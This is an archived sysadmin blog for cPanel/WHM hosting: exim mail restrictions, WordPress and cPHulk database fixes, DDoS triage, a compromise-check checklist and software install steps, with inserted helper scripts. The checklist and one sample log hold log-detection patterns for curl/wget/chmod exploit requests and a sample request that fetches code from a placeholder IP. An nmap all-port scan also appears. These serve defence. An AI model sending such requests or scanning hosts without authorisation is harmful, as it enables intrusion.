Tuesday, 31 January 2012

Mail sent by user nobody being discarded due to sender restrictions in WHM->Tweak Settings


Mail sent by the user nobody is restricted on most servers in order to prevent spamming.

In most CMSes the mail functions are handled by PHP scripts, which run as the user nobody.

If that restriction is enabled on the server, you will see entries like the following in the exim main log.

root@x3 [/home/pgnowonl/public_html]# grep 1RsSjE-0030Z3-0w /var/log/exim_mainlog
2012-02-01 13:27:32 1RsSjE-0030Z3-0w <= nobody@abc.com U=nobody P=local S=1745
2012-02-01 13:27:32 1RsSjE-0030Z3-0w ** hemanth.presence@gmail.com R=checkspam2: Mail sent by user nobody being discarded due to sender restrictions in WHM->Tweak Settings
2012-02-01 13:27:32 1RsSjE-0030Z5-1n <= <> R=1RsSjE-0030Z3-0w U=mailnull P=local S=2620
2012-02-01 13:27:32 1RsSjE-0030Z3-0w Completed



You can disable it from WHM.

WHM >> Tweak Settings

Set the option 'Prevent "nobody" from sending mail' to Off.


Prevent “nobody” from sending mail [?]
Prevent the user “nobody” from sending out mail to remote addresses
(PHP and CGI scripts generally run as “nobody” if you are using mod_php or have Suexec disabled.)



Save the settings; mail sent by 'nobody' will then be delivered.

That's the Fix. :) :)







Monday, 30 January 2012

Reset WordPress admin password

Reset WordPress admin password using database:

1. Find the database name in "wp-config.php" for the corresponding WP domain.

2. cd /var/lib/mysql

3. Take backup
   mysqldump databasename > databasename.sql

4. Enter into MySQL prompt.
   mysql

root@hostname# mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 2859662
Server version: 5.1.56-log MySQL Community Server (GPL)

mysql>

mysql> use databasename;

mysql> show tables;

5. Check for the 'wp_users' table.

mysql> select * from wp_users;   (to check the username)

mysql> update wp_users set user_pass=MD5('GIVE_STRONG_ADMIN_PASSWORD_HERE') where  user_login="admin";

mysql> quit

Now, try to access WordPress using new password.
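As an added example (not part of the original post), the steps above as a small script: it reads the database name and table prefix out of wp-config.php and prints the backup and reset commands without running them, so you can check them before pasting into mysql. The wp-config.php below is constructed; the helper names are my own. Note that the post's `wp_users` assumes the default `$table_prefix` of `wp_`, which the script reads instead of assuming.

```bash
#!/bin/sh
# Added example, not the blog's own code. Reads DB settings from a wp-config.php
# and emits the backup + password-reset commands described in the post (dry run).

# Print the value of a define('KEY', 'value') line. Handles single or double
# quotes and arbitrary spacing around the parentheses and comma.
wp_config_value() {       # $1 = wp-config.php, $2 = KEY
    sed -n "s/^[[:space:]]*define([[:space:]]*['\"]$2['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p" "$1" | head -n 1
}

# The table prefix is a plain PHP variable, not a define().
wp_table_prefix() {       # $1 = wp-config.php
    sed -n "s/^[[:space:]]*\$table_prefix[[:space:]]*=[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p" "$1" | head -n 1
}

# Build the UPDATE statement. Single quotes in the password are doubled so the
# SQL string stays valid. WordPress accepts a plain MD5 hash and replaces it with
# its own stronger hash on the next successful login.
reset_sql() {             # $1 = table prefix, $2 = login, $3 = new password
    esc=$(printf '%s' "$3" | sed "s/'/''/g")
    printf "UPDATE %susers SET user_pass=MD5('%s') WHERE user_login='%s';\n" "$1" "$esc" "$2"
}

# --- constructed sample wp-config.php ---
sample=$(mktemp)
cat > "$sample" <<'EOF'
<?php
define( 'DB_NAME', 'example_wp' );
define('DB_USER', "example_wpu");
define('DB_PASSWORD', 'not-a-real-password');
$table_prefix = 'wp_';
EOF

db=$(wp_config_value "$sample" DB_NAME)
prefix=$(wp_table_prefix "$sample")
echo "# 1. back up first:"
echo "mysqldump $db > $db.sql"
echo "# 2. then reset the password inside mysql:"
reset_sql "$prefix" admin 'GIVE_STRONG_ADMIN_PASSWORD_HERE'
rm -f "$sample"
```

Run it in the site's document root and paste the printed statement into the mysql prompt after the dump has completed.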
 

Find custom SSH port number

Art of port scanning -- nmap

We can find a custom SSH port number using nmap:

command:

 nmap -P0 -T4 -sV -p- <IP address>

           -P0: Skip host discovery and treat the host as online (spelled -Pn in newer nmap releases)
           -T<0-5>: Set timing template (higher is faster; the default is -T3)
           -sV: Probe open ports to determine service/version info
           -p <port ranges>: Only scan specified ports (-p- means all 65535 ports)
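When you already have a root shell on the box (the usual case on a cPanel server), the port can be read straight from sshd_config rather than scanned for. This is an added example, not from the original post; the config file below is constructed and the real one is /etc/ssh/sshd_config.

```bash
#!/bin/sh
# Added example: list the port(s) sshd is configured to listen on.
# sshd keywords are case-insensitive and several Port lines are allowed;
# commented-out lines (e.g. "#Port 22") are ignored and 22 is assumed when no
# Port directive is set at all.
sshd_ports() {            # $1 = path to sshd_config
    ports=$(awk 'tolower($1) == "port" { print $2 }' "$1")
    if [ -z "$ports" ]; then
        echo 22
    else
        echo "$ports"
    fi
}

# --- constructed sample sshd_config ---
sample=$(mktemp)
cat > "$sample" <<'EOF'
# default left commented out
#Port 22
Port 2222
port 2200
ListenAddress 0.0.0.0
EOF
sshd_ports "$sample"      # prints 2222 and 2200
rm -f "$sample"
```

Cross-check the result against what is actually listening (`netstat -tlnp | grep sshd`) before relying on it, since a running daemon may have been started with a different config file.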





Simple difference b/w Sub domain, Parked, and Add-On domain.


Sub domain
* Lets say your domain is mysite.com.
* You install a message board and put it in a directory called mysite.com/board/.
* You can turn the directory board into a sub-domain by adding it as a sub-domain from your Control Panel.
* Now you can access your Message board as either mysite.com/board OR board.mysite.com
* This costs you nothing.

Parked Domain
* You have two domains mysite.com and my-other-site.com.
* mysite.com is the domain of your website and you want to add my-other-site.com.
* You want them both to go to the same place. In other words, when someone types either www.mysite.com or www.my-other-site.com they will go to the same page(s) on your website.
* In order to have additional parked domains you need to purchase them from a registrar.
* Register Parked domains here (open a new account if you don't have one registered)

Add-On Domains
* You have two domains mysite.com and my-other-site.com.
* You want the two domains to be totally separate/independent websites.
* In order to have additional add-on domains you need to purchase them from a registrar.
* Register Add-on domains here (open a new account if you don't have one registered)

Sunday, 29 January 2012

Modules install with Apache to avoid DDOS attacks.



To mitigate DDoS attacks, you can install:

Mod_security
Mod_dosevasive
Mod_limitipconn
DoS-Deflate

***************
1) "Mod_security" : "Mod_security" is a module which helps to protect the server from exploits that are passed through Apache. Mod_security does this by inspecting the requests Apache receives and filtering out the "bad" ones as determined by the set of rules specified in the Apache configuration file.

2) "Mod_dosevasive" : "Mod_dosevasive" helps to prevent the overloading of a web server by a request-based attack, script attacks, brute force attacks, or even some malicious CGI scripts. Once it detects a problem it adds the offending IP to APF, which must be installed.

http://www.theserverpages.com/articles/servers/linux/apache/mod_dosevasive_Apache_Module_How-To.html

3) "Mod_limitipconn" : Apache module "Mod_limitipconn" allows web server administrators to limit the number of simultaneous downloads permitted from a single IP address.

4) "(D)DoS-Deflate" : the "(D)DoS-Deflate" script monitors and tracks the IP addresses which are establishing a large number of TCP connections to the server.
***************

1. http://www.eth0.us/mod_security > mod_security

2. http://deflate.medialayer.com/ > dos_deflate

3. http://www.eth0.us/mod_evasive > mod_evasive


You can install these modules on the server to mitigate DDoS attacks.




Few steps to be taken when you feel that the server is under DDOS attack:

Step 1: Check the load using the command "w".

Step 2: Check which service is utilizing maximum CPU by "nice top".

Step 3: Check which IP address is taking maximum connection using the command:

netstat -anpl | grep :80 | awk '{print $5}' | cut -d":" -f1 | sort | uniq -c | sort -n


Note: 'print $5' is the foreign address column, i.e. the external IPs holding connections to the server.

Step 4: Check the IP address of the server having maximum connection using the command:

netstat -alpn | grep :80 | awk '{print $4}' | cut -d: -f1 | sort | uniq -c
or
netstat -alpn | grep :80 | awk '{print $4}' | awk -F: '{print $(NF-1)}' | sort | uniq -c


Note: 'print $4' is the local address column, i.e. the IP addresses configured on the server.

Step 5: Then block the IP address using the APF firewall "apf -d <IP address>" or the CSF firewall "csf -d <IP address>".
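As an added example (not the blog's own code and not the (D)DoS-Deflate script itself), here is the core of what (D)DoS-Deflate does and what steps 3 and 4 above do by hand: count established connections per remote IP on a given port and list the IPs over a threshold. It runs over a constructed `netstat -anp` snapshot so it can be tried offline; the function names and the threshold are mine. Unlike `cut -d: -f1`, it strips the trailing `:port` with sed, so IPv4-mapped IPv6 addresses such as `::ffff:198.51.100.9:51004` are counted under the same IP as their IPv4 form.

```bash
#!/bin/sh
# Added example. Column layout follows `netstat -anp`:
#   proto recv-q send-q local-address foreign-address state pid/program

# "count ip" per remote address with an ESTABLISHED connection to local port $2.
# Matching on ":80$" avoids also matching :8080 the way `grep :80` does.
conn_per_ip() {           # $1 = netstat output file, $2 = local port
    awk -v port=":$2" '$1 ~ /^tcp/ && $4 ~ port "$" && $6 == "ESTABLISHED" { print $5 }' "$1" \
      | sed -e 's/:[0-9]*$//' -e 's/^::ffff://' | sort | uniq -c | sort -rn
}

# Remote IPs whose count exceeds $3 (DoS-Deflate's NO_OF_CONNECTIONS idea).
# The real tool then hands these to apf/csf; here they are only printed.
over_threshold() {        # $1 = file, $2 = port, $3 = max connections
    conn_per_ip "$1" "$2" | awk -v max="$3" '$1 > max { print $2 }'
}

# --- constructed snapshot (documentation IP ranges, nothing real) ---
sample=$(mktemp)
cat > "$sample" <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1234/httpd
tcp        0      0 203.0.113.1:80          198.51.100.9:51001      ESTABLISHED 1235/httpd
tcp        0      0 203.0.113.1:80          198.51.100.9:51002      ESTABLISHED 1236/httpd
tcp        0      0 203.0.113.1:80          198.51.100.9:51003      ESTABLISHED 1237/httpd
tcp        0      0 203.0.113.1:80          192.0.2.44:40022        ESTABLISHED 1238/httpd
tcp        0      0 203.0.113.1:8080        192.0.2.44:40023        ESTABLISHED 1239/httpd
tcp6       0      0 ::ffff:203.0.113.1:80   ::ffff:198.51.100.9:51004 ESTABLISHED 1240/httpd
tcp        0      0 203.0.113.1:80          192.0.2.7:40100         TIME_WAIT   -
EOF

echo "connections per remote IP on :80"
conn_per_ip "$sample" 80          # 4 198.51.100.9 / 1 192.0.2.44
echo "over 3 connections:"
over_threshold "$sample" 80 3     # 198.51.100.9
rm -f "$sample"
```

On a live box feed it with `netstat -anp > /tmp/snap.txt` and review the list before blocking anything: a busy NAT gateway or a monitoring service can legitimately hold many connections.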

Friday, 27 January 2012

Find user Bandwidth via SSH shell (CPanel/WHM)

How to find the bandwidth utilized by individual users via SSH?


1) Create a new file with the following code.
2) chmod +x bandwidth
3) Then execute the file with 2 parameters, viz. month and year.



vi bandwidth

#!/bin/bash
# Usage: ./bandwidth month year
# Sums the "-all" byte counts of each user's bandwidth file for that month/year.
cd /var/cpanel/bandwidth/ || exit 1
for user in $(ls | grep -v "\."); do
    printf '%s = ' "$user"
    egrep "^$1\..*\.$2-all" "$user" | awk -F'=' 'BEGIN {bytes=0} { bytes+=$2 } END {print bytes/1024/1024 " MB"}'
done
cd - > /dev/null

Usage:

./bandwidth month year

E.g. to see the top 10 bandwidth-consuming users in January 2012:

./bandwidth 1 2012 | sort -nrk 3 | head -10

The above shows the result in descending order, highest bandwidth usage first.

User names can be mapped to domain names using /etc/trueuserdomains.
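The per-user summation from the script above, as an added example (not the blog's code) that runs over a constructed bandwidth file so the anchoring of the pattern can be checked: it assumes the "month.day.year-all=bytes" line format the script relies on, and the function name is mine. The pattern is anchored on both sides of the month so that month 1 does not also pick up 11 and 12.

```bash
#!/bin/sh
# Added example: total "-all" bytes for one user file, one month, in MB.
month_mb() {              # $1 = bandwidth file, $2 = month, $3 = year
    grep "^$2\.[0-9]*\.$3-all=" "$1" \
      | awk -F'=' 'BEGIN { bytes = 0 } { bytes += $2 } END { printf "%.2f MB\n", bytes / 1024 / 1024 }'
}

# --- constructed sample file (format assumed as described above) ---
sample=$(mktemp)
cat > "$sample" <<'EOF'
1.5.2012-all=1048576
1.6.2012-all=2097152
11.5.2012-all=52428800
12.31.2011-all=1048576
EOF
echo "January 2012:  $(month_mb "$sample" 1 2012)"    # 3.00 MB
echo "November 2012: $(month_mb "$sample" 11 2012)"   # 50.00 MB
echo "February 2012: $(month_mb "$sample" 2 2012)"    # 0.00 MB
rm -f "$sample"
```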

Monday, 23 January 2012

Check if the server is hacked or not


How to check if the server is hacked or not?

These are simple steps to check whether your server has been hacked.


The following are a few checks to investigate whether a Linux server has been hacked. Work through them one by one and analyse the results.


Who is on the Server:
$ w

$ netstat -nalp | grep ":22"

OR


$ w && netstat -nalp | grep ":22"
The above commands show who is logged into the server.



Who was on the Server
$ last


$ cat /var/log/secure* | grep ssh | grep Accept


$ cat /var/log/secure* | grep ftp | grep Accept



Check the current network activity of your server
$ netstat -nalp


$ nmap localhost

OR


$ netstat -nalp && nmap localhost


What Processes are Running:
$ ps -elf


$ ls /proc/*/exe -la


What Files are in the Common Attack Points:
$ ls /tmp -la


$ ls /var/tmp -la


$ ls /dev/shm -la
These world-writable directories are the usual places where an intruder drops files on a Linux server.

Don't delete anything or make changes just yet; just catalog everything. Do not access a file with cat or strings; catalog the files and save that for later. Once you start deleting things you can no longer investigate how deep they have penetrated. Don't be fooled into seeing a common Apache compromise and thinking it ended there. Many times that was just the broken window they used to get in the first time, while they are tunnelling deeper trying to get root access.



What version of Linux is running
$ cat /etc/redhat-release


For non Red-Hat Linux
$ cat /etc/issue


Compare this to the kernel
$ uname -a

and


$ cat /proc/version


Who is the author of the file:
$ ls -la --author


When was the file last accessed:
$ ls -l --time=access

Before you run off and use the cat command it is good to first check the file type with the file command. Many a time I myself have been fooled seeing a file marked as something.html and finding it was really a binary file.



What kind of file is it (ASCII or binary):
$ file filename

OR


$ file /path/to/directory/*

So far you have avoided running any obvious virus scanner that would show up in the process list, so as not to tip off the intruder, but checking files by hand is tedious and slow.



Update the Locate Database:
$ updatedb &

If this is a web server then the next thing to hunt for is signs of Apache exploits and SQL injection scripts. This nice little script was handed down to me from a co-worker and does a nice job of hunting through the log files rather than the long tedious work of searching manually.



Search for Apache Exploit
$ for i in `locate access_log`; do echo $i; egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' $i; done

OR


$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /path/to/log/files/*


cPanel
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*

$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*


Ensim
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/virtual/site*/fst/var/log/httpd/*


Plesk
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/httpd/vhosts/*/statistics/logs/*

$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /var/log/httpd/*


Search for Shell Code:
$ grep -F '\x90' /path/to/access/logs/*
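The two log searches above, as an added example (not the blog's or the co-worker's script) that summarises the hits per client IP and shows the matched requests for triage, run over a few constructed combined-format log lines using documentation IP ranges. Function names are mine; the pattern is the one from the post. The sample deliberately includes a harmless request (`/docs/curl%20manual.pdf`) that the pattern flags, which is why the matches are listed for review rather than acted on automatically.

```bash
#!/bin/sh
# Added example: the access-log exploit search with per-client summary.
PATTERN='(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'

# "count ip" for every client whose requests match the exploit pattern.
suspicious_clients() {    # $@ = access log files
    grep -E -i -h "$PATTERN" "$@" | awk '{ print $1 }' | sort | uniq -c | sort -rn
}

# The request lines that matched, for manual review before anything is deleted.
suspicious_requests() {   # $@ = access log files
    grep -E -i -h "$PATTERN" "$@" | awk -F'"' '{ print $2 }'
}

# Lines containing the NOP-sled byte as Apache logs it (the four characters \x90).
# -F makes grep treat the backslash literally; the post's "/x90/" never matched.
shellcode_lines() {       # $@ = access log files
    cat "$@" | grep -F -c '\x90' || true
}

# --- constructed sample log ---
sample=$(mktemp)
cat > "$sample" <<'EOF'
192.0.2.10 - - [23/Jan/2012:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
198.51.100.23 - - [23/Jan/2012:10:00:02 +0000] "GET /page.php?x=wget%20http://203.0.113.5/t HTTP/1.1" 404 210 "-" "-"
198.51.100.23 - - [23/Jan/2012:10:00:03 +0000] "GET /page.php?x=system(id) HTTP/1.1" 404 210 "-" "-"
192.0.2.10 - - [23/Jan/2012:10:00:04 +0000] "GET /docs/curl%20manual.pdf HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
203.0.113.9 - - [23/Jan/2012:10:00:05 +0000] "GET /\x90\x90\x90\x90 HTTP/1.1" 400 0 "-" "-"
EOF

echo "clients with suspicious requests:"
suspicious_clients "$sample"      # 2 198.51.100.23 / 1 192.0.2.10
echo "matched requests:"
suspicious_requests "$sample"
echo "lines with \\x90: $(shellcode_lines "$sample")"   # 1
rm -f "$sample"
```

Point it at the real logs with `suspicious_clients /usr/local/apache/logs/* /home/*/statistics/logs/*` on cPanel; the 404s and the response sizes in the matched lines tell you whether a probe actually succeeded.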

From these steps you can tell whether the server has been hacked. I hope they help you in troubleshooting. Please leave your comments if you like this post or have any queries.



Install Zend module via RPM

How to install Zend module via RPM?

These are the steps to install the Zend module via RPM.

1) Download the repository package
rpm -Uvh http://download.fedora.redhat.com/pub/epel/5/i386/epel-release-5-4.noarch.rpm
or
rpm -Uvh http://rpms.famillecollet.com/enterprise/remi-release-5.rpm
2) Install Zend Framework 1.11.3
yum --enablerepo=remi install php-ZendFramework
3) Install Zend Framework full setup
yum --enablerepo=remi install php-ZendFramework* --exclude php-ZendFramework-Db-Adapter-Oracle
4) Custom setup
yum --enablerepo=remi install php-ZendFramework \
php-ZendFramework-Cache-Backend-Memcached php-ZendFramework-Db-Adapter-Mysqli \
php-ZendFramework-Dojo php-ZendFramework-Feed php-ZendFramework-Gdata \
php-ZendFramework-Pdf php-ZendFramework-Search-Lucene \
php-ZendFramework-Services php-ZendFramework-Soap php-ZendFramework-demos \
php-ZendFramework-extras php-ZendFramework-tests
5) Create New Zend test-project and Test That The Zend Framework is Working.
zf show version
Zend Framework Version: 1.11.3
6) Create new Zend project
## Change to web directory ##
cd /var/www/html

## Create new Zend Framework project using zf command ##
zf create project test-project
Creating project at /var/www/html/test-project
Note: This command created a web project, for more information setting up your VHOST, please see docs/README
7) Create a link (symlink) to, or copy, the Zend directory into your project directory
## Change directory to /var/www/html/test-project/library ##
cd test-project/library
## OR ##
cd /var/www/html/test-project/library

## Symlink Zend Framework on library path ##
ln -s /usr/share/php/Zend .

## OR ##

## Copy Zend Framework on library path ##
cp -R /usr/share/php/Zend .
8) Check test-project directory content
Should look like following (check also library/Zend):


test-project
|-- application
|   |-- Bootstrap.php
|   |-- configs
|   |   `-- application.ini
|   |-- controllers
|   |   |-- ErrorController.php
|   |   `-- IndexController.php
|   |-- models
|   `-- views
|       |-- helpers
|       `-- scripts
|           |-- error
|           |   `-- error.phtml
|           `-- index
|               `-- index.phtml
|-- docs
|   `-- README.txt
|-- library
|   `-- Zend -> /usr/share/php/Zend
|-- public
|   `-- index.php
`-- tests
    |-- application
    |   `-- bootstrap.php
    |-- library
    |   `-- bootstrap.php
    `-- phpunit.xml

16 directories, 11 files

9) Check the index page in a browser
Open following url http://localhost/test-project/public/ on your browser.


Saturday, 21 January 2012

cPHulk bruteforce attack + remove IP address from database

How to remove the IP address from cPHulk bruteforce attack via cPanel database?

---------
This account is currently locked out because a brute force attempt was detected. Please wait 10 minutes and try again. Attempting to login again will only increase this delay. If you frequently experience this problem, we recommend having your username changed to something less generic.
----------
or
----------
You cannot login to the account - Brute Force protection
----------

Normally we just whitelist the IP address in the cPHulk option in WHM, but the IP address is still present in the database.

How can we remove the IP address from the database?

First find the public IP address of your local machine.

http://www.whatismyip.com

If you can SSH to the server, log in as root and execute the following on the server.

Code:
# mysql
prompt should change to mysql

Code:
mysql> use cphulkd;
you will see "Database changed"

Code:
mysql>BACKUP TABLE `brutes` TO '/path/to/backup/directory';
backup first!

Code:
mysql> SELECT * FROM `brutes` WHERE `IP`='xxx.xxx.xxx.xxx';
substitute your IP for xxx.xxx.xxx.xxx. Is your IP there? If so,

Code:
mysql> DELETE FROM `brutes` WHERE `IP`='xxx.xxx.xxx.xxx';
that removes your IP from the table, and the mysql reply confirms it. Finally


Code:
mysql> quit
should return you to your usual prompt.


Now you can proceed logging into the cPanel without any issue.


The commands below flush the whole database, i.e. all blocked IPs are removed.
mysql> delete from brutes;
Query OK, 0 rows affected (0.00 sec)

mysql> delete from logins;
Query OK, 32 rows affected (0.00 sec)

cPanel spammers

How to detect spammers on a cPanel exim server?

On a cPanel server, eximstats is one of the most useful commands for finding the information you need, yet many do not use it to detect spammers. Here is the command to detect spammers via eximstats; its output lets you identify the likely spammers on a cPanel server.

Execute the following command.
/usr/sbin/eximstats -t10 /var/log/exim_mainlog > /root/stats.txt


-t10 = show the top 10 of each of the following


The above command gives the following details:

- top 10 local destinations by volume
- top 10 local destinations by message count
- top 10 sending hosts by volume
- top 10 sending hosts by message count


It also lists the top 10 email IDs/users sending mail (the likely spammers), current exim statistics and more.

All the output is stored in the text file /root/stats.txt. You can just cat that file, or read it with less or vi. From the details in it you can identify the spammers.
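As an added example (not the blog's or cPanel's code), a few awk one-liners over exim_mainlog that answer the same questions eximstats does (who is sending the most, by envelope sender and by SMTP AUTH login) and, for the "Mail sent by user nobody being discarded" post above, which sender addresses are being hit by that restriction, so you know which scripts are affected before switching it off. The log lines below are constructed in exim's format; the function names are mine. The `A=` field is what matters when a mailbox password has leaked, since the spammer's envelope sender is often forged while the authenticated login is not.

```bash
#!/bin/sh
# Added example: spammer triage straight from exim_mainlog.

# Top N envelope senders by message count. "<=" marks a message arrival and the
# sender address is the field right after it.
top_senders() {           # $1 = exim_mainlog, $2 = how many
    awk '$4 == "<=" { print $5 }' "$1" | sort | uniq -c | sort -rn | head -n "$2"
}

# Top N authenticated accounts: the A= field names the login that was used.
top_auth_users() {        # $1 = exim_mainlog, $2 = how many
    awk '$4 == "<=" { for (i = 6; i <= NF; i++) if ($i ~ /^A=/) print substr($i, 3) }' "$1" \
      | sort | uniq -c | sort -rn | head -n "$2"
}

# Senders whose mail was discarded by WHM's "prevent nobody from sending mail":
# remember each message id's sender, collect the ids of the discard lines, join.
discarded_by_nobody() {   # $1 = exim_mainlog
    awk '$4 == "<=" { from[$3] = $5 }
         /being discarded due to sender restrictions/ { hit[$3] = 1 }
         END { for (id in hit) print from[id] }' "$1" | sort | uniq -c | sort -rn
}

# --- constructed sample exim_mainlog ---
sample=$(mktemp)
cat > "$sample" <<'EOF'
2012-02-01 13:27:32 1Abcde-000001-Ab <= nobody@site-a.example U=nobody P=local S=1745
2012-02-01 13:27:32 1Abcde-000001-Ab ** someone@example.org R=checkspam2: Mail sent by user nobody being discarded due to sender restrictions in WHM->Tweak Settings
2012-02-01 13:27:32 1Abcde-000001-Ab Completed
2012-02-01 13:28:10 1Abcde-000002-Cd <= nobody@site-b.example U=nobody P=local S=1801
2012-02-01 13:28:10 1Abcde-000002-Cd ** other@example.org R=checkspam2: Mail sent by user nobody being discarded due to sender restrictions in WHM->Tweak Settings
2012-02-01 13:29:00 1Abcde-000003-Ef <= nobody@site-a.example U=nobody P=local S=1600
2012-02-01 13:29:00 1Abcde-000003-Ef ** x@example.org R=checkspam2: Mail sent by user nobody being discarded due to sender restrictions in WHM->Tweak Settings
2012-02-01 13:30:00 1Abcde-000004-Gh <= bulk@site-c.example H=(host) [192.0.2.5] P=esmtpa A=dovecot_login:bulk@site-c.example S=3100
2012-02-01 13:30:01 1Abcde-000005-Ij <= bulk@site-c.example H=(host) [192.0.2.5] P=esmtpa A=dovecot_login:bulk@site-c.example S=3100
2012-02-01 13:30:02 1Abcde-000006-Kl <= alice@site-c.example H=(host) [192.0.2.6] P=esmtpa A=dovecot_login:alice@site-c.example S=900
EOF

echo "top senders:";        top_senders "$sample" 5
echo "top auth logins:";    top_auth_users "$sample" 5
echo "discarded (nobody):"; discarded_by_nobody "$sample"
rm -f "$sample"
```

On a real server run them against /var/log/exim_mainlog (and the rotated copies) and compare with the eximstats report; a login near the top of `top_auth_users` that does not belong to a mailing-list or newsletter account is the usual sign of a stolen password.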

How to disable a Joomla plugin?


To turn off cache, you need to do two things:

Global Configuration--> System-->Cache Settings-->Cache
Set Cache to 'No'.

Extensions-->Plugin Manager-->System - Cache
Disable the "System - Cache" plugin.

Windows Server 2003 Administrator password change


To change the Administrator password in Windows Server 2003, please follow the steps given below.

===
1. Log on to the computer using the Administrator account.

2. Click Start, right-click Administrative Tools, and then click Open. Administrative Tools opens.

3. Double-click Computer Management, click Local Users and Groups, and in the details pane, double-click Users. The Users folder opens.

4. In the details pane, right-click the account that you want to change, and click Set Password. A warning dialog box opens. Read the information to determine whether you want to proceed with the step to change the password.

5. In New Password, type a password. In Confirm password, retype the password, and then click OK.
===

That's it :) You are done :)

Have a nice day :)

Thursday, 12 January 2012

OpenMeetings installation on Linux servers

OpenMeetings is software used for web conferencing and online training. The following guidelines show how to install it on your Linux server.

+ First, check whether MySQL is installed on the server. If it is, set UTF-8 as its default character set: open my.cnf (vi /etc/my.cnf) and add the following lines under the [mysqld] section. Don't forget to restart the MySQL service after the change :)

------------------
default-character-set=utf8
character-set-server=utf8
------------------
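The my.cnf edit above done idempotently, as an added example (not from the original post): it adds a setting under [mysqld] only if that section does not already have it, and creates the section when the file has none, so the step can be re-run safely. The sample file is constructed and the function name is mine. One caveat for newer servers: `default-character-set` is a client option, and MySQL 5.5 and later refuse to start when it appears under [mysqld], so on those versions put only `character-set-server=utf8` there.

```bash
#!/bin/sh
# Added example: section-aware "ensure key=value under [mysqld]" for my.cnf.

# Return 0 if $2 is already set inside the [mysqld] section of $1.
# (A plain grep would also match the same key under [client] and skip the add.)
mysqld_has_option() {     # $1 = my.cnf, $2 = key
    awk -v key="$2" '
        /^\[/ { in_mysqld = ($0 ~ /^\[mysqld\]/) }
        in_mysqld && $0 ~ ("^[ \t]*" key "[ \t]*=") { found = 1 }
        END { exit (found ? 0 : 1) }' "$1"
}

# Insert "key=value" right after the [mysqld] header unless already present;
# append a new [mysqld] section when the file has none.
ensure_mysqld_option() {  # $1 = my.cnf, $2 = key, $3 = value
    if mysqld_has_option "$1" "$2"; then
        return 0
    fi
    awk -v kv="$2=$3" '
        { print }
        /^\[mysqld\]/ { print kv; seen = 1 }
        END { if (!seen) { print "[mysqld]"; print kv } }
    ' "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}

# --- constructed sample my.cnf ---
sample=$(mktemp)
cat > "$sample" <<'EOF'
[client]
default-character-set=utf8

[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock

[mysqld_safe]
log-error=/var/log/mysqld.log
EOF
ensure_mysqld_option "$sample" character-set-server utf8
ensure_mysqld_option "$sample" character-set-server utf8   # second call changes nothing
cat "$sample"
rm -f "$sample"
```

Restart MySQL afterwards and confirm with `SHOW VARIABLES LIKE 'character_set_server';` that the setting took effect.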

+ Next remove the distribution's ImageMagick and sox packages from the server (they are rebuilt from source below).

---------------
# rpm -e ImageMagick-6.2.8.0-4.el5_1.1
# rpm -e --nodeps sox-12.18.1-1
---------------

+ The "rpmforge repo" needs to be installed. Use the following command to install it.

--------------
# rpm -Uvh http://pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.3.6-1.el3.rf.x86_64.rpm
--------------

+ Add the following line to rc.local (vi /etc/rc.local) so that OpenOffice starts automatically after a reboot.
------------

/usr/lib/openoffice.org3/program/soffice "-accept=socket,host=localhost,port=8100;urp;StarOffice.ServiceManager" -nologo -headless -nofirststartwizard &

------------

+ Install the required modules.

-------------
# yum install freetype freetype-devel fontconfig fontconfig-devel java-1.6.0-openjdk-devel libtiff libtiff-devel libjpeg-devel libjpeg giflib giflib-devel libpaper libpaper-devel xml-commons-apis libpng libpng-devel libxml2 libxml2-devel fftw3 fftw3-devel cairo cairo-devel flac flac-devel wavpack wavpack-devel libsndfile libsndfile-devel libmad libmad-devel yasm-devel yasm gcc gcc-c++
-------------

+ The next step is to install required OpenOffice products.

-------------
# yum groupinstall 'Office/Productivity'
# yum install openoffice.org-headless
-------------

+ Now we need to build the remaining required tools from source.


1. Ghostscript:

-----------
# cd /usr/src
# wget http://ghostscript.com/releases/ghostscript-8.71.tar.gz
# tar zxvf ghostscript-8.71.tar.gz
# cd ghostscript-8.71
# ./configure --prefix=/usr
# mkdir obj
# mkdir bin
# make all
# make install
-----------

2. Lame:

-----------
# cd /usr/src
# wget http://downloads.sourceforge.net/project/lame/lame/3.98.4/lame-3.98.4.tar.gz
# tar zxvf lame-3.98.4.tar.gz
# cd lame-3.98.4
# ./configure --prefix=/usr
# make all
# make install
-----------

3. SWFTools:

-----------
# cd /usr/src
# wget http://www.swftools.org/swftools-0.9.1.tar.gz
# tar zxvf swftools-0.9.1.tar.gz
# cd swftools-0.9.1
# ./configure --prefix=/usr
# make all
# make install
-----------

4. ImageMagick:

-----------
# cd /usr/src
# wget ftp://ftp.imagemagick.org/pub/ImageMagick/ImageMagick-6.6.4-10.tar.gz
# tar zxvf ImageMagick-6.6.4-10.tar.gz
# cd ImageMagick-6.6.4-10
# ./configure --prefix=/usr
# make all
# make install
-----------

5. SoX:

-------------
# cd /usr/src
# wget -O sox-14.3.1.tar.gz 'http://sourceforge.net/projects/sox/files/sox/14.3.1/sox-14.3.1.tar.gz/download?use_mirror=space'
# tar zxvf sox-14.3.1.tar.gz
# cd sox-14.3.1
# ./configure --prefix=/usr
# make all
# make install
-------------

6. Install SVN:

----------
# yum install subversion
----------

7. Install FFmpeg:

-----------
# cd /usr/src
# svn checkout svn://svn.ffmpeg.org/ffmpeg/trunk ffmpeg
# cd ffmpeg
